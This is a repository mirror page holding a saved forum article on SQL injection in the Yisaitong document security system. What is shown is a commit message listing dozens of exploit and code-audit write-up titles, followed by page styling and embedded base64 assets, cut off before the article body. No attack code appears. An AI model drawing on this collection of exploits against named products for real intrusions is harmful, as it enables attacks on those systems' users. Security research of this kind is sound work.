admin/Penetration_Testing_POC
1
0
Fork 0
mirror of https://github.com/Mr-xn/Penetration_Testing_POC.git synced 2025-08-12 11:06:04 +00:00
Code Issues Packages Projects Releases Wiki Activity
Penetration_Testing_POC/books/亿赛通电子文档安全管理系统 CDGAuthoriseTempletService1 SecretLevelId SQL注入漏洞代码分析2.html

520 lines
2.9 MiB
HTML
Raw Normal View History

add 漏洞复现+代码审计+IOT相关文章合计61篇 (Nday)泛微E-office 10 OfficeServer.php 下载_上传漏洞分析 2024 RWCTF群晖 BC500摄像头RCE--未授权_栈溢出 CVE-2024-30188 Apache DolphinScheduler 任意文件读写漏洞分析 CVE-2024-36412 SuiteCRM未授权sql注入分析 CVE-2024-38856 Apache OFBiz Authentication Bypass CVE-2024-43044 Jenkins Remoting远程代码执行漏洞分析 Dedecms后台RCE的一些方法 – fushulingのblog Exchange邮服渗透技巧 H3C-iMC智能管理中心autoDeploy. JAVA安全之Velocity模板注入刨析 Laravel 11.x 反序列化链分析 Nacos 0day(derby_源码)分析 _ 不出网利用 Nacos <=2.4.0.1 任意文件读写删 Spring Cloud Data Flow 漏洞分析(CVE-2024-22263_CVE-2024-37084) Unnamed page.NET恶意软件Dark Crystal RAT的详细样本分析 Zimbra 邮服渗透技巧 Zimbra邮服渗透技巧 java中js命令执行与绕过 - unam4 java中js命令执行的攻与防 wookteam协作平台searchinfo接口SQL注入漏洞分析 【原创】Xinhu RockOA v2.6.2 SQL注入漏洞 _ 安全团队贡献平台 【原创】(CVE-2024-7919)安徽德顺智能科技有限公司 JIELINK_ INTELLIGENT TERMINAL OPERATION PLATROFM 未授权访问漏洞 _ 安全团队贡献平台 【原创】(CVE-2024-7920)安徽德顺智能科技有限公司 JIELINK_ INTELLIGENT TERMINAL OPERATION PLATROFM 信息泄露漏洞 _ 安全团队贡献平台 【原创】(CVE-2024-7921)安徽德顺智能科技有限公司 JIELINK_ INTELLIGENT TERMINAL OPERATION PLATROFM 信息泄露漏洞 _ 安全团队贡献平台 万户graph include.jsp sql注入的漏洞分析 万户oa中receivefile_gd存在SQL注入 亿赛通新一代电子文档安全管理系统 SecretKeyService SQL注入漏洞 亿赛通新一代电子文档安全管理系统 logincontroller JNDI注入致远程代码执行漏洞(XVE-2024-8758) 亿赛通新一代电子文档安全管理系统-LogDownLoadService-mssql-sql注入漏洞分析 亿赛通电子文档安全管理系统 CDGAuthoriseTempletService1 SecretLevelId SQL注入漏洞代码分析 亿赛通电子文档安全管理系统 CDGAuthoriseTempletService1 SecretLevelId SQL注入漏洞代码分析2 亿赛通电子文档安全管理系统DecryptionApp反序列化漏洞RCE 从seacms12.9教你学会代码审计 代码审计之nbcio-boot从信息泄露到Getshell 信呼OA nickName SQL注入漏洞复现(XVE-2024-19304) 内网活动目录利用方法 内网渗透横向移动技巧 域内日志分析 安卓逆向——Frida的进阶用法 帆软 FineReport ReportServer SQL注入致RCE漏洞 悦库企业网盘 userlogin 护网红队-从apk反编译审计到getshell全过程 易宝oa软件两处-ExecuteSqlForSingle注入分析与复现 智慧校园(安校易)管理系统 ReceiveClassVideo.ashx 存在文件上传漏洞 比较有意思的几个漏洞挖掘记录 泛微e-cology testConnByBasePassword JDNI注入致远程代码执行漏洞分析(XVE-2024-20913) 泛微云桥e-Bridge addResume任意文件上传漏洞分析 浅析通天星CMSV6车载定位监控平台远程代码执行漏洞 海康威视iSecure Center综合安防管理平台认证绕过分析 海康威视综合安防管理平台clusters页面文件上传漏洞 海康威视综合安防管理平台uploadAllPackage任意文件上传漏洞复现分析 海康威视综合安防系统 detection 接口远程命令执行 深澜认证计费系统代码审计(登录绕过_前后台RCE_文件读取_信息泄漏_XXS_SSRF) 用友NC complainbilldetail SQL注入漏洞 用友致远OA后台RCE constDef.do命令执行漏洞分析 积木报表AviatorScript代码注入RCE分析 章管家印章智慧管理平台 listUploadIntelligent接口sql注入漏洞分析与复现 蓝凌OA WechatLoginHelper.do SQL注入漏洞复现分析 记一次Spring boot框架代审与思考 记一次对通天星CMSV6车载视频监控平台的多个漏洞(getImage、delete.do、disable、merge、upload、SESSION伪造、StandardLoginAction_getAllUser、反序列化、xz_center)分析复现 记一次有趣的通达OA审计过程
2024-08-30 22:09:31 -07:00
<!DOCTYPE html> <html style><!--
Page saved with SingleFile
url: https://forum.butian.net/article/527
--><meta charset=utf-8>
<meta http-equiv=X-UA-Compatible content="IE=edge">
<meta name=viewport content="width=device-width, initial-scale=1">
<meta name=csrf-token content=sKaWQokrOTC3iA9XXzaH65D8iBGicq4jNmsDOLZX>
<title>亿赛通电子文档安全管理系统 CDGAuthoriseTempletService1 SecretLevelId SQL注入漏洞代码分析2</title>
<meta name=keywords content=奇安信,天眼,补天,漏洞,情报,攻防,安全>
<meta name=description content=奇安信攻防社区-某通文档xxx系统sql注入分析>
<meta name=author content="QIANXIN Team">
<meta name=copyright content="2021 QIANXIN.com">
<style>:root{--sf-img-28: /* original URL: https://forum.butian.net/static/images/default_avatar.jpg */ url("data:image/jpeg;base64,/9j/4AAQSkZJRgABAgEAlgCWAAD/7QAsUGhvdG9zaG9wIDMuMAA4QklNA+0AAAAAABAAlgAAAAEAAQCWAAAAAQAB/+E+rWh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC8APD94cGFja2V0IGJlZ2luPSLvu78iIGlkPSJXNU0wTXBDZWhpSHpyZVN6TlRjemtjOWQiPz4KPHg6eG1wbWV0YSB4bWxuczp4PSJhZG9iZTpuczptZXRhLyIgeDp4bXB0az0iQWRvYmUgWE1QIENvcmUgNi4wLWMwMDQgNzkuMTY0NTcwLCAyMDIwLzExLzE4LTE1OjUxOjQ2ICAgICAgICAiPgogICA8cmRmOlJERiB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPgogICAgICA8cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0iIgogICAgICAgICAgICB4bWxuczp4bXA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC8iCiAgICAgICAgICAgIHhtbG5zOnhtcEdJbWc9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9nL2ltZy8iCiAgICAgICAgICAgIHhtbG5zOmRjPSJodHRwOi8vcHVybC5vcmcvZGMvZWxlbWVudHMvMS4xLyI+CiAgICAgICAgIDx4bXA6Q3JlYXRvclRvb2w+QWRvYmUgSWxsdXN0cmF0b3IgMjUuMiAoTWFjaW50b3NoKTwveG1wOkNyZWF0b3JUb29sPgogICAgICAgICA8eG1wOkNyZWF0ZURhdGU+MjAyMS0wOC0yM1QxNjo1NjowNSswODowMDwveG1wOkNyZWF0ZURhdGU+CiAgICAgICAgIDx4bXA6VGh1bWJuYWlscz4KICAgICAgICAgICAgPHJkZjpBbHQ+CiAgICAgICAgICAgICAgIDxyZGY6bGkgcmRmOnBhcnNlVHlwZT0iUmVzb3VyY2UiPgogICAgICAgICAgICAgICAgICA8eG1wR0ltZzp3aWR0aD4yNTY8L3htcEdJbWc6d2lkdGg+CiAgICAgICAgICAgICAgICAgIDx4bXBHSW1nOmhlaWdodD4yNTY8L3htcEdJbWc6aGVpZ2h0PgogICAgICAgICAgICAgICAgICA8eG1wR0ltZzpmb3JtYXQ+SlBFRzwveG1wR0ltZzpmb3JtYXQ+CiAgICAgICAgICAgICAgICAgIDx4bXBHSW1nOmltYWdlPi85ai80QUFRU2taSlJnQUJBZ0VBU0FCSUFBRC83UUFzVUdodmRHOXphRzl3SURNdU1BQTRRa2xOQSswQUFBQUFBQkFBU0FBQUFBRUEmI3hBO0FRQklBQUFBQVFBQi8rNEFEa0ZrYjJKbEFHVEFBQUFBQWYvYkFJUUFCZ1FFQkFVRUJnVUZCZ2tHQlFZSkN3Z0dCZ2dMREFvS0N3b0smI3hBO0RCQU1EQXdNREF3UURBNFBFQThPREJNVEZCUVRFeHdiR3hzY0h4OGZIeDhmSHg4Zkh3RUhCd2NOREEwWUVCQVlHaFVSRlJvZkh4OGYmI3hBO0h4OGZIeDhmSHg4Zkh4OGZIeDhmSHg4Zkh4OGZIeDhmSHg4Zkh4OGZIeDhmSHg4Zkh4OGZIeDhmSHg4Zi84QUFFUWdCQUFFQUF3RVImI3hBO0FBSVJBUU1SQWYvRUFhSUFBQUFIQVFFQkFRRUFBQUFBQUFBQUFBUUZBd0lHQVFBSENBa0tDd0VBQWdJREFRRUJBUUVBQUFBQUFBQUEmI3hBO0FRQUNBd1FGQmdjSUNRb0xFQUFDQVFNREFnUUNCZ2NEQkFJR0FuTUJBZ01SQkFBRklSSXhRVkVHRTJFaWNZRVVNcEdoQnhXeFFpUEImI3hBO1V0SGhNeFppOENSeWd2RWxRelJUa3FLeVkzUENOVVFuazZPek5oZFVaSFREMHVJSUpvTUpDaGdaaEpSRlJxUzBWdE5WS0JyeTQvUEUmI3hBOzFPVDBaWFdGbGFXMXhkWGw5V1oyaHBhbXRzYlc1dlkzUjFkbmQ0ZVhwN2ZIMStmM09FaFlhSGlJbUtpNHlOam8rQ2s1U1ZscGVZbVomI3hBO3FibkoyZW41S2pwS1dtcDZpcHFxdXNyYTZ2b1JBQUlDQVFJREJRVUVCUVlFQ0FNRGJRRUFBaEVEQkNFU01VRUZVUk5oSWdaeGdaRXkmI3hBO29iSHdGTUhSNFNOQ0ZWSmljdkV6SkRSRGdoYVNVeVdpWTdMQ0IzUFNOZUpFZ3hkVWt3Z0pDaGdaSmpaRkdpZGtkRlUzOHFPend5Z3AmI3hBOzArUHpoSlNrdE1UVTVQUmxkWVdWcGJYRjFlWDFSbFptZG9hV3ByYkcxdWIyUjFkbmQ0ZVhwN2ZIMStmM09FaFlhSGlJbUtpNHlOam8mI3hBOytEbEpXV2w1aVptcHVjblo2ZmtxT2twYWFucUttcXE2eXRycSt2L2FBQXdEQVFBQ0VRTVJBRDhBOVFZcTdGWFlxN0ZYWXE3RlhZcTcmI3hBO0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcTdGWFlxN0YmI3hBO1hZcTdGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlgmI3hBO1lxN0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcTdGWFkmI3hBO3E3RlhZcTdGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXEmI3hBOzdGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcTcmI3hBO0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcXBYZDNhV2R2SmMzYzBkdmJSRGxMUEt3UkZIaXpNUUJpcVc2RDUmI3hBO3U4cStZQklkQzFpeTFUMHFpVVdkeEZPVm9hZkVJMllqNmNWVGZGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXEmI3hBOzdGWFlxN0ZYWXE3RlhZcTdGWFlxN0ZYWXE3RlhZcWtYbUx6MTVNOHRxVHIydDJXbXNCeUVWeE9pU2tmNU1kZWJmUU1WZVJlZWYrY3UmI3hBO1BKT202YzYrVTRaZGMxV1U4TE5wSW5ndGExb1hibndtWUE5QXFEa2R1UXhWaXVqZmtUK2IzNXF6UjY5K1ordVhHbGFkSTNxVzJrY2YmI3hBOzN5b2VuQzNxc1Z0c2FWWUYvd0NZWXFqL0FEci9BTTRuM25sMktQekYrVm1yM3NPdDZjdnFDem5sWDFaU2czOUNhTlk2TzFQc01PTGUmI3hBO0k2WXFpL3kvL3dDY3R0Ri9SYVdIbjYxdWJIWExKakJmM2tFSEtJbFR4OVNXRlNKSW01Yk1xb1J5OEtoY1ZlditXdnpWL0xuek54WFImI3hBO1BNTmxkU3ZUamJtUVJUbXYvRk12Q1gvaGNWWlhpcnNWZGlyc1ZkaXJzVmRpcnNWZGlyc1ZkaXJzVmRpcnNWZGlyc1ZkaXJzVmRpcnMmI3hBO1ZkaXJzVmFabFZTekVLcWlyTWRnQU1WZWVlYlArY2dQeW04czhrdk5laHU3cGF
<style>@media (max-width:767px){}</style>
<style>/*!
* Bootstrap v3.4.1 (https://getbootstrap.com/)
* Copyright 2011-2019 Twitter, Inc.
* Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
*//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}footer,nav{display:block}template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}strong{font-weight:700}img{border:0}button,input,textarea{color:inherit;font:inherit;margin:0}button{overflow:visible}button{text-transform:none}button{-webkit-appearance:button}textarea{overflow:auto}/*! Source: https://github.com/h5bp/html5-boilerplate/blob/master/src/css/main.css */@media print{*,:after,:before{color:#000!important;text-shadow:none!important;background:0 0!important;-webkit-box-shadow:none!important;box-shadow:none!important}a,a:visited{text-decoration:underline}a[href]:after{content:" ("attr(href)")"}a[href^="#"]:after,a[href^="javascript:"]:after{content:""}img{page-break-inside:avoid}img{max-width:100%!important}h2,h3,p{orphans:3;widows:3}h2,h3{page-break-after:avoid}.navbar{display:none}}@font-face{font-family:"Glyphicons Halflings";src:/* original URL: https://forum.butian.net/static/css/bootstrap/fonts/glyphicons-halflings-regular.woff2 */url(data:font/woff2;base64,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
<style>/*!
* Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome
* License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License)
*/@font-face{font-family:"FontAwesome";src:/* original URL: https://forum.butian.net/static/css/font-awesome/fonts/fontawesome-webfont.woff2?v=4.7.0 */url(data:font/woff2;base64,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
<style>@media (min-width:1200px){.navbar-form{width:235px}}@media (min-width:768px){.navbar-form .form-control{width:100%}}@media (max-width:767px){.global-nav{width:100%;text-align:center;z-index:1000}}@media (max-width:767px){}.global-nav .nav{height:44px;padding:0}.navbar-form .btn{position:absolute;top:8px;right:30px;color:#999;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none}.navbar-form .btn:hover,.navbar-form .btn:focus{color:#777}@media (min-width:768px){}@media (min-width:992px){}@media (min-width:1200px){}html{font-size:10px;-webkit-tap-highlight-color:transparent}body{font-family:-apple-system,"Helvetica Neue",Helvetica,Arial,"PingFang SC","Hiragino Sans GB","WenQuanYi Micro Hei","Microsoft Yahei",sans-serif;font-size:14px;line-height:1.5;color:#333;background-color:#f6f6f6;word-break:break-word}button,input,textarea{font-family:inherit;font-size:inherit;line-height:inherit}ul{padding:0}.wrap{padding-bottom:30px;position:relative}.main{background-color:#fff;border-radius:4px}.mb-10{margin-bottom:10px}.mb-20{margin-bottom:20px}.mb-50{margin-bottom:50px}.mt-10{margin-top:10px}.mt-15{margin-top:15px}.mt-30{margin-top:30px}.mt-60{margin-top:60px}.ml-10{margin-left:10px}.mr-5{margin-right:5px}.span-line{margin-left:8px;margin-right:8px;color:#999}.text-fmt{overflow:hidden;font-size:14px;line-height:1.6;word-wrap:break-word}.logo{float:left;margin:0;display:inline-block;width:150px}.logo a{display:block;height:50px;width:145px;background-image:/* original URL: https://forum.butian.net/css/default/logo.svg */url(data:image/svg+xml;base64,PHN2ZyBpZD0i5Zu+5bGCXzEiIGRhdGEtbmFtZT0i5Zu+5bGCIDEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgdmlld0JveD0iMCAwIDQyNi4xMyAxMTEuNDIiPjxkZWZzPjxzdHlsZT4uY2xzLTF7ZmlsbDojZmZmO308L3N0eWxlPjwvZGVmcz48dGl0bGU+5aWH5a6J5L+h5pS76Ziy56S+5Yy6X2xvZ288L3RpdGxlPjxwYXRoIGNsYXNzPSJjbHMtMSIgZD0iTTExMiw1Ny4zM3YtNGgzNy43OHY0aC00LjM5VjcxLjE4cS4wOCw1LjUzLTUuMTksNS40NGgtNC44OXYtNGgyLjM0YzEuMiwwLDEuNzgtLjYyLDEuNzUtMS45M1Y1Ny4zM1ptMS44LTExLjkydi00aDEzLjg1VjM4LjkzaDYuNDh2Mi41MWgxMy45M3Y0SDEzNi4zNXEzLDIuNTEsMTAuOTIsNC4zMXYzLjQ3UTEzNiw1MS42NSwxMzAuODcsNDcuNXEtNS4xLDQuMTQtMTYuMzYsNS42OVY0OS43MmM1LjI1LTEuMiw4Ljg4LTIuNjQsMTAuOTItNC4z